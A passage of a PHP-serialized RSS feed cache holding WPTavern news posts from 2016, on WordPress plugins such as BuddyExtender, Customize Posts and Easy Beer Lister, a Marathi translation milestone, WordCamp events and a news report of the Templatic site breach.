target=\"_blank\">bp-custom.php file</a></em> to make changes to BuddyPress default settings.</p>\n<p><a href=\"https://wordpress.org/plugins/buddyextender/\" target=\"_blank\">BuddyExtender</a> is a new plugin from the development team at <a href=\"https://webdevstudios.com/\" target=\"_blank\">WebDevStudios</a> that aims to make it easier for community managers to access extra configuration options. The plugin puts a dozen internal BuddyPress settings at your fingertips, including avatar sizes, autocomplete settings, the ability to disable @mentions, and more.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/buddy-extender.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/buddy-extender.png?resize=678%2C1141\" alt=\"buddy-extender\" class=\"aligncenter size-full wp-image-54389\" /></a></p>\n<p>Once installed, the plugin can be configured at Settings -> BuddyExtender in the admin. Each setting has an explanation on <a href=\"https://pluginize.com/buddyextender-plugin/\" target=\"_blank\">the plugin’s homepage on Pluginize</a>, WebDevStudio’s new plugin shop. Some of these settings have the ability to powerfully affect the display of your BuddyPress site, so its creators warn users to try it on a test environment before going live with their selections. The team plans to add more options to the plugin in the future. You can download <a href=\"https://wordpress.org/plugins/buddyextender/\" target=\"_blank\">BuddyExtender</a> for free from WordPress.org.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 May 2016 22:33:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"WPTavern: Customize Posts Plugin and Selective Refresh are Paving the Way for Front-End Editing Powered by the Customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54345\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"http://wptavern.com/customize-posts-plugin-and-selective-refresh-are-paving-the-way-for-front-end-editing-powered-by-the-customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5016:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/customize-posts.jpg\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/customize-posts.jpg?resize=1024%2C583\" alt=\"photo credit: Paintbrush - (license)\" class=\"size-full wp-image-54351\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/93249705@N03/13067171403\">Paintbrush</a> – <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">(license)</a>\n<p>Last week Weston Ruter and the folks at XWP released <a href=\"https://make.xwp.co/2016/04/29/customize-posts-v0-5-released/\" target=\"_blank\">Customize Posts version 0.5</a>, which includes a new framework for postmeta and the ability to preview featured images. The feature <a href=\"https://wordpress.org/plugins/customize-posts/\" target=\"_blank\">plugin</a> aims to <a href=\"https://core.trac.wordpress.org/ticket/34923\" target=\"_blank\">introduce basic content authorship in the Customizer</a> to improve the new user site setup experience and make it easier to edit existing content.</p>\n<p>As of 0.5, Customize Posts supports the ability to change and preview the page template, and will sync changes back to the metabox on the page edit screen. It also supports changing the post author, excerpt, and comment/ping status, with live previews and changes saved to the editor. Check out Ruter’s screencast touring the plugin’s newest capabilities:</p>\n<div class=\"embed-wrap\"></div>\n<h3>Front-End Editing Powered by the Customizer: A Not-Too-Distant Possibility</h3>\n<p>With all these advanced editing capabilities, it doesn’t take a giant leap to imagine a future where the customizer provides the architecture for a front-end post editor. While WordPress’ <a href=\"https://make.wordpress.org/design/tag/front-end-editor/\" target=\"_blank\">front-end editor project</a> seems to have gone dormant, improvements to the Customizer are steadily chipping away at the various aspects of content authorship that are not yet editable on the frontend.</p>\n<p>“Now that we have the ability to selectively refresh elements without doing full page reloads, this opens the door to using these Customizer components outside of the Customizer itself, such as in the frontend,” Ruter said.</p>\n<p>Front-end editing of partials, which are similar to customizer controls but exist in the preview, is a natural extension of the selective refresh architecture and a concept that Ruter will be exploring in the near future.</p>\n<p>“Consider, for example, being logged-in on the frontend,” Ruter said. “You see something you want to edit and you click on it. Since the Customizer partials all have selectors associated with them, if the partials are registered with each logged-in frontend request, then there are containers that can be targeted for editing.”</p>\n<p>Ruter envisions that clicking on an element would load the controls for that element on demand via a lazy-loaded Customizer pane or a floating control. He said that this would work in concert with customizer transactions (aka snapshots) to store the changes persistently in a transaction.</p>\n<p>Front-end editing powered by the customizer, according to Ruter, would involve the following:</p>\n<ol>\n<li>Being able to click Customize in the admin bar to lazy-load the Customizer pane’s controls into the existing page without having to having to navigate to `customize.php`</li>\n<li>Being able to click on individual containers that have associated partials to start editing controls that relate to those partials</li>\n<li>All changes made on the frontend to be persisted in a transaction draft that is initialized on demand</li>\n</ol>\n<p>The ability to edit posts in the customizer on the front-end isn’t going to happen overnight, but Ruter thinks a proof of concept could be available this year.</p>\n<p>“It’s going to take some discovery and prototyping, similar to Customize Posts,” Ruter said. “My guess is there would be something to play around with in Q3, depending on other projects and having enough time to put down on paper these ideas that have been floating around for a couple years.”</p>\n<p>An important step towards making that possible will be getting <a href=\"https://core.trac.wordpress.org/ticket/34923\" target=\"_blank\">basic content authorship added to the Customizer</a>, which Ruter and contributors are working towards for the upcoming WordPress 4.6 release.</p>\n<p>These will be welcome changes for those who are looking to do more on the frontend, but it still leaves the bulk of content editing behind the admin. Unless you’re a developer who follows every update to the customizer, it’s still confusing for the average WordPress user to know what content can be edited on the frontend vs. content that requires returning to the admin. The editing experience will remain disjointed until the majority of tasks can be done on the frontend.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 May 2016 18:15:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"WPTavern: Templatic Hacked, Files and Databases Compromised\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54339\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"http://wptavern.com/templatic-hacked-files-and-databases-compromised\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2362:\"<p><a href=\"https://templatic.com\">Templatic</a>, a WordPress commercial theme company, <a href=\"https://templatic.com/news/our-site-was-hacked/\">reported on</a> Saturday, April 30th, that its site was hacked. Files and databases containing customer usernames and passwords were compromised. According to R. Bhavesh, founder of Templatic, the data is being held for ransom money.</p>\n<blockquote><p>The hacker is now threatening us via email and demanding ransom money be paid. This hacker is also threatening to misuse the data they’ve illegally gained access to and email our data to customers.</p>\n<p>While this is a very serious and dangerous threat, we are not going to give in to threats and we will not be negotiating with any hacker and that’s no matter how much they try.</p></blockquote>\n<p>Bhavesh is working with local authorities and security experts who are investigating the matter. Since transactions on Templatic are handled directly by PayPal or 2Checkout, hackers were not able to obtain credit card information.</p>\n<h2>Customers Should Immediately Change Their Passwords</h2>\n<p>If you’ve ever shared cPanel, FTP, or wp-admin, login credentials with Templatic, you should immediately change your passwords. If you are using a product that relies on the Tevolution plugin and haven’t updated yet, you should <a href=\"https://templatic.com/news/security-vulnerability-found-themes/\">do so immediately</a>.</p>\n<p>Customers are advised to ignore emails sent from Templatic, “The email we sent today is the last email we will send regarding this matter. Anything further, we will share it on our social mediate accounts at <a href=\"https://twitter.com/templatic\">twitter</a>, <a href=\"https://www.facebook.com/templatic\">facebook</a> and <a href=\"https://templatic.com/blog\">our official blog</a> here,” Bhavesh said.</p>\n<p>Customers are also advised to create a full backup of their sites and use a <a href=\"https://sitecheck.sucuri.net//\">free site scanning tool</a> to scan for unknown files. Bhavesh apologized for what happened and says he accepts full responsibility, “I take up the responsibility of this and I sincerely apologize to each single one of our customers. We assure you that we are taking best security measures and fight this, no matter what.”</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 May 2016 17:18:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"WPTavern: WordPress is Now 100% Translated Into Marathi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54325\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wptavern.com/wordpress-is-now-100-translated-into-marathi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2089:\"<p>The Polyglots team announced this week that <a href=\"https://mr.wordpress.org/\" target=\"_blank\">WordPress is now 100% translated into Marathi</a>, an Indian language with an estimated 73 million native speakers. Marathi is one of the official languages of Western India and is the <a href=\"https://en.wikipedia.org/wiki/List_of_languages_by_number_of_native_speakers\" target=\"_blank\">19th most spoken language in the world</a> ranked by the number of native speakers.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/wp-in-marathi.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/wp-in-marathi.png?resize=1025%2C252\" alt=\"wp-in-marathi\" class=\"aligncenter size-full wp-image-54327\" /></a></p>\n<p>Less than a week ago, the Marathi translation was at just 10%, but the new translation teams rallied during the <a href=\"http://wptavern.com/global-wordpress-translation-day-draws-448-participants-from-105-countries\" target=\"_blank\">Global WordPress Translation Day</a> event to complete it in a matter of days. According to organizer Petya Raykovska, “India was the big surprise with four of the big Indian languages getting new contributors, forming teams, and connecting across India with one another to collaborate live.”</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Last year Hindi was far from 100%. Today 8 events in India translate to bo_IN, hi_IN, mr, gu, ml <a href=\"https://twitter.com/hashtag/WPTranslationday?src=hash\">#WPTranslationday</a> <a href=\"https://t.co/Lq5DoJrf0Q\">pic.twitter.com/Lq5DoJrf0Q</a></p>\n<p>— Petya Raykovska (@petyeah) <a href=\"https://twitter.com/petyeah/status/724103477002166272\">April 24, 2016</a></p></blockquote>\n<p></p>\n<p>Thanks to the eight local translation team events in India, Marathi received a strong enough push to get all WordPress strings translated at 100% just a few days after the event concluded. Hindi is also now at 100% and the other Indian languages are off to a good start with the newly-formed translation teams.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 29 Apr 2016 21:48:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: Create Beer Menus with the Easy Beer Lister Plugin for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54030\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"http://wptavern.com/create-beer-menus-with-the-easy-beer-lister-plugin-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5072:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/05/beer.jpg\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/05/beer.jpg?resize=869%2C415\" alt=\"beer\" class=\"aligncenter size-full wp-image-43810\" /></a></p>\n<p>The explosion of the craft beer scene in recent years means that more breweries and beer bars are <a href=\"http://wptavern.com/30-beautiful-brewery-websites-built-with-wordpress\" target=\"_blank\">building their websites on WordPress</a>. What are you looking for when you visit one of these websites? Why, the beer of course! Unfortunately, with the demands of brewing and serving customers, owners of these establishments don’t always have time to update their available beers.</p>\n<p>The <a href=\"https://wordpress.org/plugins/easy-beer-lister/\" target=\"_blank\">Easy Beer Lister</a> plugin was created to help breweries keep their information up-to-date. It offers an easy way for users to organize beer on on their websites with the additional benefit of being able to create beer menus with the same information. The menus are mobile friendly and can be printed or displayed on a TV screen.</p>\n<p>Alex Standiford initially started on this project out of a desire to improve his WordPress plugin development skills, but it quickly grew from there once he learned how difficult it is for brewers to keep their beer information up-to-date across all of their mediums.</p>\n<p>“Many breweries copy/paste their beer menu to their website, or simply don’t update their website at all,” Standiford said. “I even heard of a brewer who was staying up late every Friday to update his powerpoint presentation for his beer menu!</p>\n<p>“Once I realized how much time this was taking from the busy brewery owner, I knew that I needed to do something better than what others have done. I needed to provide them with a single place to update their beer information, where they could efficiently display it to customers in many different ways.”</p>\n<p>Easy Beer Lister adds a Beer Post Type to your WordPress site with special fields for ABV, OG, IBU, Untappd URL, video, and an image gallery.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/beer-post-type-easy-beer-lister.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/beer-post-type-easy-beer-lister.png?resize=793%2C476\" alt=\"beer-post-type-easy-beer-lister\" class=\"aligncenter size-full wp-image-54312\" /></a></p>\n<p>Beer styles can be added as categories and beer pairings as tags. Availability can also be specified via a custom taxonomy using terms such as On-Tap, Spring, Summer, Year-Round, etc. Beers take on the design of the active theme, but you can further customize the post type to improve its display. The plugin comes with a few basic templates, but Standiford is also creating more that can be added on.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/beer-page.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/beer-page.png?resize=1025%2C826\" alt=\"beer-page\" class=\"aligncenter size-full wp-image-54314\" /></a></p>\n<p>Once beers are organized and added to WordPress, users can create custom beer menus to display available beers. Sorting methods, such as availability, food pairings, and what’s on tap, can be bulk-edited in the admin.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/beer-menu.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/beer-menu.png?resize=1025%2C577\" alt=\"beer-menu\" class=\"aligncenter size-full wp-image-54317\" /></a></p>\n<p>Easy Beer Lister also includes shortcodes for displaying a specific beer or a list of beers:</p>\n<ul>\n<li><strong>[beer]</strong> – Create a URL to a specified beer. The link also shows a preview of the beer when you hover over it with your mouse.</li>\n<li><strong>[beer_list]</strong> – Create a list of beers based on specified parameters, such as style or pairings.</li>\n</ul>\n<p>Standiford plans to open a marketplace for GPL add-ons that extend Easy Beer Lister. <a href=\"http://www.easybeerlister.com/downloads/untappd-importer/\" target=\"_blank\">Untappd Importer</a> is his first add-on, which makes it easy for breweries to get started without having to manually enter all of their beers.</p>\n<p>“With this add-on, I was able to import all 600+ beers from Dogfish Head Brewing’s Untappd page in about three minutes, including the ABV and IBU information,” Standiford said. He is working on other add-ons such as a beer image generator, an Instagram photo import function, and a bartender suite that allows bartenders to access a page to add/remove beers from the tap menu/website quickly.</p>\n<p>“The plugin is more than a tool to help brewers manage their beer on their website,” Standiford said. “I aim to use it to dramatically reduce the amount of time a brewer spends updating beer information on all facets of their business.”</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 29 Apr 2016 18:46:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: WordCamp Organizers Get New Tool for Creating Personalized WordCamp Badges\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54270\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/wordcamp-organizers-get-new-tool-for-creating-personalized-wordcamp-badges\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3947:\"<p>Creating personalized WordCamp badges for attendees has traditionally been a time-consuming task for event organizers. Last year the community held 89 WordCamps with 21,000 attendees, and each person received a name badge customized for the event they participated in. That’s a massive number of badges to prepare for printing.</p>\n<p>In the past, WordCamp organizers <a href=\"https://make.wordpress.org/community/handbook/wordcamp-organizer-handbook/first-steps/helpful-documents-and-templates/create-wordcamp-badges-with-gravatars/personalized-badges-with-indesign/\" target=\"_blank\">used an InDesign template for making the badges</a>, but this required a tedious process of creating a CSV file of attendees, running a custom script, and completing a list of complicated steps. George Stephanis, who had experience using the InDesign template, wanted to simplify this process for organizers and help them move away from having to use a proprietary, commercial software product.</p>\n<p>He <a href=\"https://make.wordpress.org/community/2016/02/12/name-badges-are-hard-to-make-and-confusing-for-organizers/\" target=\"_blank\">built a proof-of-concept plugin</a> that allows organizers to create badges with HTML and CSS inside the WordPress admin. After several iterations and contributions from the community team, Ian Dunn <a href=\"https://make.wordpress.org/community/2016/04/26/new-tool-for-creating-personalized-wordcamp-badges/\" target=\"_blank\">announced</a> that the tool is now ready for use.</p>\n<p>WordCamp organizers can access the tool under Tickets > Tools > Generate Badges or by navigating through the Customizer to the CampTix HTML Badges panel. The default badge design is shown below with the back of the badge (upside-down) and the front beneath it with a marker for poking the lanyard holes. User names and gravatars are automatically displayed.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/wordcamp-badges-with-html-css.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/wordcamp-badges-with-html-css.png?resize=900%2C783\" alt=\"wordcamp-badges-with-html-css\" class=\"aligncenter size-full wp-image-54285\" /></a></p>\n<p>Stephanis included the CodeMirror bundled with Jetpack’s Custom CSS module to make it easier for organizers to customize the badge design to suit the theme of the WordCamp. The plugin also makes it fairly easy to customize any aspect of the badge using CSS.</p>\n<p>“The underlying markup has plenty of CSS classes to help with customization,” Dunn said. “For example, you could make volunteer badges have a different background color (so that volunteers are easier to find), or make attendees’ last names appear in a smaller font than their first names. There are also plenty of empty < div > elements that you can re-purpose for arbitrary design features.”</p>\n<p>Once the design is finished, organizers can export as a PDF and take it to a print shop. Documentation for customizing the badges is <a href=\"https://make.wordpress.org/community/handbook/wordcamp-organizer-handbook/first-steps/helpful-documents-and-templates/create-wordcamp-badges-with-gravatars/personalized-badges-with-html-css/\" target=\"_blank\">available in the WordCamp Organizer handbook</a>.</p>\n<p>Organizers are still welcome to use the InDesign tool to create badges, but the new plugin for the customizer is a much easier entry point for those who aren’t familiar with InDesign. If you can help improve the tool, the code is open source on the <a href=\"https://meta.svn.wordpress.org/sites/trunk/wordcamp.org/public_html/wp-content/plugins/camptix-badge-generator\" target=\"_blank\">Meta repository</a> and <a href=\"https://make.wordpress.org/community/handbook/wordcamp-organizer-handbook/first-steps/web-presence/contributing-to-wordcamp-org/\" target=\"_blank\">available for anyone to patch</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 28 Apr 2016 23:15:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: WordCamp Tokyo 2016 Calls for Speakers, Adds New English Track\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54145\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/wordcamp-tokyo-2016-calls-for-speakers-adds-new-english-track\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2318:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/wordcamp-tokyo.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/wordcamp-tokyo.png?resize=1025%2C506\" alt=\"wordcamp-tokyo\" class=\"aligncenter size-full wp-image-54265\" /></a><br />\n<a href=\"https://2016.tokyo.wordcamp.org/\" target=\"_blank\">WordCamp Tokyo 2016</a> will be held September 17-18 at the <a href=\"http://www.bellesalle.co.jp/room/bs_shinjukugrand/\" target=\"_blank\">Bellesalle Shinjuku Grand</a>. This will be the 9th edition of the event, which sold out last year with 750 attendees.</p>\n<p>Yesterday the WordCamp’s organizers put out a <a href=\"https://2016.tokyo.wordcamp.org/04/27/call-for-speakers-en/\" target=\"_blank\">call for both for English and Japanese speakers</a>. Last year the event hosted a selection of <a href=\"https://2015.tokyo.wordcamp.org/session/6-3/\" target=\"_blank\">English sessions</a>, but the 2016 edition will add a dedicated track for English speakers with simultaneous interpretation.</p>\n<p>The WordCamp will be broken into three tracks: User, Technical, and Global. Descriptions and example topics for each are available in the <a href=\"https://2016.tokyo.wordcamp.org/04/27/call-for-speakers-en/\" target=\"_blank\">post</a> calling for speakers. All English language presentations will be placed under the Global track but speakers are welcome to submit any topic.</p>\n<p>The theme of WordCamp Tokyo 2016 is “breaking dawn.” With the advent of the WP REST API and the recent surge in WordPress-powered application development, the WordPress community is entering a new era. Organizers have selected a motto as part of the theme:</p>\n<p>“<em>Let’s try something new</em>,” said organizer Toru Miki. “That is the message we want to get across to the WordCamp Tokyo 2016 attendees. Our goal is to offer sessions that can motivate and stimulate them, just like the beam of sunlight in the dawn.”</p>\n<p>If you want to attend one of the biggest WordCamps on the planet and you have a topic that you think can inspire attendees, the speaker application deadline is Friday, June 10. Presentations can be 15 minutes, 30 minutes, or 75 minutes. Applicants will be notified of their acceptance status by mid-July.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 28 Apr 2016 20:38:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah 